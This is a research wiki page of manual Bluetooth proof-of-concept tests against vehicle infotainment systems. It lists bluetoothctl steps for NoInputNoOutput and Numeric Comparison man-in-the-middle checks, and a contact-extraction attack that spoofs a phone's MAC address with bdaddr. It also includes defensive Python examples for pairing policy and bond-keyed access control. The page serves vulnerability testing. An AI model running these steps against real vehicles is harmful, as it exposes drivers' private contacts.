Manual Exploits

sgxgsx edited this page Aug 9, 2024 · 2 revisions

Always pairable

This check can be used to assess the severity of the other attacks. If the target device is pairable even when the user has not navigated to the pairing/discovery menu, the device has a higher exposure to the threats described on this page.

It should be noted that previous research showed that Bluetooth MAC addresses can be passively collected with high probability.

To check the target device:

  • obtain a MAC address of a target
  • do not navigate to the pairing/discovery menu
  • try to connect to the target using bluetoothctl and hcitool

Only the vehicle can initiate a connection

This check applies mainly to In-Vehicle Infotainment (IVI) systems. IVI systems generally allow the phone to connect to them but lack the capability of connecting back. There are also IVI systems that allow the connection to be initiated in both directions. The most secure option is a connection initiated by the IVI system. It should also be noted that defences against the attacks might be implemented for a connection initiated by the phone while the same defences are lacking when the connection is initiated by the IVI system.

Fast reboot

This is a check of whether or not it is possible to reboot the target device. Some devices, such as In-Vehicle Infotainment systems, generally cannot be rebooted unless the vehicle is switched off and locked for 10-20 minutes.

The result could be additionally used to assess the severity of Denial of Service exploits.

Insecure Numeric Comparison Implementation

Summary:

The IVI system does not properly implement the Numeric Comparison authentication protocol as defined in the Bluetooth Core Specification, which leaves the link unauthenticated and thus vulnerable to the NiNo, Method Confusion and custom MitM attacks.

Requirements:

Ubuntu Laptop/PC

PoC steps:

  1. execute bluetoothctl command
  2. In the bluetoothctl shell execute:
  3. Command: scan on
  4. Command: connect IVI_MAC_ADDRESS_
  5. Look closely at the IVI screen: the user does not have control over accepting or declining the connection. Another variant is that the IVI does not show a code first but only simple Yes/No buttons and the name of the device (which can be forged), and once the connection is established it only offers the possibility to disconnect.
  6. This small mistake breaks all the guarantees of the BT pairing protocol and makes it vulnerable to MitM attacks.

Vehicular NiNo

Summary:

The vehicle allows connections to a device with no input or output capabilities. According to the specification, if one of the devices has the NoInputNoOutput capability, the pairing mode used is named Just Works, and such a link must be considered unauthenticated and vulnerable to MitM attacks. This results in an adjacent adversary being able to execute a practical attack and establish a MitM position.

Important distinction: In this case, the vehicle doesn't allow NoInputNoOutput devices to initiate a connection to the IVI, but fails to check the same for a connection initiated by the IVI. The attack window is smaller than in a usual NiNo attack but still exists.

Note on NiNo devices in the vehicular domain: In the vehicular domain, the usage of NiNo devices such as headphones is infrequent, if legal at all, while driving. In the smartphone domain a connection to such devices is considered a feature and a usability trade-off, for example to enable wireless headphones. As this use case is not present in the vehicular domain, it is better to disallow connections from such devices, which many manufacturers already do.

Requirements:

Ubuntu Laptop/PC

PoC steps:

  1. execute bluetoothctl command
  2. In the bluetoothctl shell execute:
  3. Command: agent off
  4. Command: agent NoInputNoOutput
  5. Command: discoverable on
  6. Command: pairable on
  7. Command: scan on
  8. Go to a BT menu in the IVI, and start looking for devices
  9. Find your laptop/PC and initiate a connection from the vehicle to the laptop/PC
  10. Accept the connection request in bluetoothctl shell by typing yes.
  11. If the connection is established - the IVI is vulnerable.

If you don't know how to get the MAC address:

  1. execute bluetoothctl command
  2. In the bluetoothctl shell execute:
  3. Command: scan on
  4. Command: discoverable on
  5. Then from the IVI system find your laptop/PC MAC address or name and connect it. Then you can use that MAC address in the future steps.
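The two findings above (Insecure Numeric Comparison and Vehicular NiNo) both come down to which association model the IO capabilities of the two devices select, and whether that model authenticates the link. The following is an added example, not code from this wiki or from any IVI vendor: it derives the association model from the capability pair using the Core Specification mapping (Secure Simple Pairing / LE Secure Connections, no OOB data, MITM protection requested) and wraps it in a simple IVI-side pairing policy that rejects the unauthenticated Just Works model in both connection directions, which is the mitigation the note above describes. The names IoCap, Model, Association and PairingPolicy are this example's own, not a real stack API.

```python
"""Association-model derivation and an IVI pairing policy (added example)."""
from dataclasses import dataclass
from enum import Enum
from typing import Tuple


class IoCap(Enum):
    DISPLAY_ONLY = "DisplayOnly"
    DISPLAY_YES_NO = "DisplayYesNo"
    KEYBOARD_ONLY = "KeyboardOnly"
    NO_INPUT_NO_OUTPUT = "NoInputNoOutput"
    KEYBOARD_DISPLAY = "KeyboardDisplay"


class Model(Enum):
    JUST_WORKS = "Just Works"
    NUMERIC_COMPARISON = "Numeric Comparison"
    PASSKEY_ENTRY = "Passkey Entry"


@dataclass(frozen=True)
class Association:
    model: Model
    authenticated: bool  # True only when the model protects against MITM


def _can_confirm(cap: IoCap) -> bool:
    """Can show a 6-digit number and answer yes/no."""
    return cap in (IoCap.DISPLAY_YES_NO, IoCap.KEYBOARD_DISPLAY)


def _can_input(cap: IoCap) -> bool:
    return cap in (IoCap.KEYBOARD_ONLY, IoCap.KEYBOARD_DISPLAY)


def _can_display(cap: IoCap) -> bool:
    return cap in (IoCap.DISPLAY_ONLY, IoCap.DISPLAY_YES_NO, IoCap.KEYBOARD_DISPLAY)


def association_model(a: IoCap, b: IoCap) -> Association:
    """Core Spec IO-capability mapping (no OOB, MITM requested):
      * either side NoInputNoOutput            -> Just Works (unauthenticated)
      * both sides can display and confirm     -> Numeric Comparison
      * one side inputs, the other displays    -> Passkey Entry
      * both KeyboardOnly                      -> Passkey Entry
      * anything else (e.g. two DisplayOnly)   -> Just Works (unauthenticated)
    """
    if IoCap.NO_INPUT_NO_OUTPUT in (a, b):
        return Association(Model.JUST_WORKS, False)
    if _can_confirm(a) and _can_confirm(b):
        return Association(Model.NUMERIC_COMPARISON, True)
    if (_can_input(a) and _can_display(b)) or (_can_input(b) and _can_display(a)):
        return Association(Model.PASSKEY_ENTRY, True)
    if a == IoCap.KEYBOARD_ONLY and b == IoCap.KEYBOARD_ONLY:
        return Association(Model.PASSKEY_ENTRY, True)
    return Association(Model.JUST_WORKS, False)


@dataclass(frozen=True)
class PairingPolicy:
    """Hypothetical IVI-side policy: refuse any pairing whose model is
    unauthenticated, regardless of which side initiated it."""
    local_io: IoCap
    allow_unauthenticated: bool = False  # vehicular default: reject Just Works

    def decide(self, remote_io: IoCap, initiated_locally: bool) -> Tuple[bool, str]:
        assoc = association_model(self.local_io, remote_io)
        direction = "outbound" if initiated_locally else "inbound"
        if assoc.authenticated or self.allow_unauthenticated:
            return True, f"accept {direction} pairing: {assoc.model.value}"
        return False, f"reject {direction} pairing: {assoc.model.value} is unauthenticated"


if __name__ == "__main__":
    ivi = PairingPolicy(IoCap.DISPLAY_YES_NO)  # typical IVI: screen with Yes/No buttons
    for remote in IoCap:
        for outbound in (False, True):
            print(remote.value, *ivi.decide(remote, initiated_locally=outbound))
```

The policy evaluates the same rule for inbound and outbound pairings on purpose: the "important distinction" above is exactly the case where an IVI checks the remote capability only when the phone initiates and skips it when the IVI does.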

Contact Extractor attack

Summary:

The vehicle IVI system allows a physical adversary to extract contacts that were previously shared over Bluetooth. This happens due to incorrect handling of access control for newly created BT sessions from already known MAC addresses.

The exploit is not publicly available

Requirements:

  • Ubuntu Laptop/PC
  • Android/iPhone phone (not rooted) with test contacts. The contacts should be in international format for ease of testing.

PoC steps:

  1. Take an Android/iPhone phone and connect it to the IVI system.
  2. Allow sharing the contacts, and share them.
  3. Go to the call/contacts app of the IVI system and scroll through the contacts.
  4. Note the MAC address of the phone (an adversary can do it passively).
  5. Switch off the Bluetooth on the phone.
  6. Execute the following commands, changing PHONE_MAC_ADDRESS to the MAC address of the phone:
     sudo bdaddr -i hci0 PHONE_MAC_ADDRESS
     sudo hciconfig hci0 reset
     sudo systemctl restart bluetooth.service
  7. Note the second MAC address in the output of the tool (it is the MAC address of the laptop/PC); in the following steps it is referred to as LAPTOP_MAC_ADDRESS.
  8. Now execute the bluetoothctl command.
  9. In the bluetoothctl shell execute:
  10. Command: scan on
  11. Command: connect IVI_MAC_ADDRESS
  12. Accept the connection on the IVI screen.
  13. Then on the IVI screen go to the contacts app of the IVI.
  14. Use the search button and search for + (you need to look for the start of the phone number).
  15. Alternatively go to the dial pad app and search for + (you need to look for the start of the phone number).
  16. Now you should find the contacts shared by the phone.

If you don't know how to get the MAC address:

  1. execute bluetoothctl command
  2. In the bluetoothctl shell execute:
  3. Command: scan on
  4. Command: discoverable on
  5. Then from the IVI system find your laptop/PC MAC address or name and connect it. Then you can use that MAC address in the future steps.
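The root cause stated in the summary is that the IVI ties the synced phonebook to the Bluetooth device address, which any new session can present, instead of to the pairing bond. The following is an added example, not code from this wiki or from any vendor's IVI: it contrasts an address-keyed contact store with a bond-keyed one in which reading contacts requires an authenticated, encrypted link using the same stored link key, and a fresh pairing from an already known address invalidates what was synced under the old bond. The class names, the session fields and the link-key identifiers are this example's own constructed placeholders, not real key material or a real stack API.

```python
"""Address-keyed vs bond-keyed phonebook access control (added example)."""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional


@dataclass(frozen=True)
class Bond:
    addr: str         # Bluetooth device address; can be presented by any device
    link_key_id: str  # identifier derived from the stored link key (hypothetical)


@dataclass
class Session:
    addr: str
    link_key_id: Optional[str]  # None when no stored bond backs this link
    encrypted: bool
    authenticated: bool         # pairing used a MITM-protected association model


class AddressKeyedStore:
    """Weak design implied by the page: contacts are keyed by the address,
    so any new session from a known address can read them."""

    def __init__(self) -> None:
        self.contacts: Dict[str, List[str]] = {}

    def share(self, s: Session, contacts: Iterable[str]) -> None:
        self.contacts[s.addr] = list(contacts)

    def read(self, s: Session) -> List[str]:
        return self.contacts.get(s.addr, [])


class BondKeyedStore:
    """Hardened design: contacts are keyed by (address, link key), access
    needs an authenticated encrypted link under that key, and a re-pairing
    from the same address drops the entry synced under the previous bond."""

    def __init__(self) -> None:
        self.contacts: Dict[Bond, List[str]] = {}

    def _bond(self, s: Session) -> Optional[Bond]:
        if not (s.encrypted and s.authenticated and s.link_key_id):
            return None
        return Bond(s.addr, s.link_key_id)

    def on_new_pairing(self, addr: str, new_link_key_id: str) -> None:
        """Called when a device with this address completes a new pairing:
        data shared under a different link key must not carry over."""
        stale = [b for b in self.contacts if b.addr == addr and b.link_key_id != new_link_key_id]
        for b in stale:
            del self.contacts[b]

    def share(self, s: Session, contacts: Iterable[str]) -> bool:
        b = self._bond(s)
        if b is None:
            return False
        self.contacts[b] = list(contacts)
        return True

    def read(self, s: Session) -> List[str]:
        b = self._bond(s)
        return self.contacts.get(b, []) if b else []


def demo():
    """Replays the page's scenario with constructed data: the phone shares
    contacts, then a second device presents the phone's address with a
    fresh pairing (and therefore a different link key)."""
    addr = "AA:BB:CC:DD:EE:01"  # constructed sample address
    phone = Session(addr, link_key_id="lk-phone", encrypted=True, authenticated=True)
    newcomer = Session(addr, link_key_id="lk-new", encrypted=True, authenticated=True)
    sample = ["+1 555 0100", "+44 20 7946 0000"]  # constructed, international format

    weak = AddressKeyedStore()
    weak.share(phone, sample)
    leaked = weak.read(newcomer)  # same address -> contacts returned

    strong = BondKeyedStore()
    strong.share(phone, sample)
    strong.on_new_pairing(newcomer.addr, newcomer.link_key_id)
    withheld = strong.read(newcomer)  # different bond -> nothing returned
    purged = strong.read(phone)       # old bond was dropped on re-pairing
    return leaked, withheld, purged


if __name__ == "__main__":
    print(demo())
```

In the hardened store the newcomer gets nothing even without the purge step, because its bond differs from the phone's; the purge additionally forces the phone itself to share again after any re-pairing under its address, which is the behaviour a user would expect after "accepting a connection" on the IVI screen.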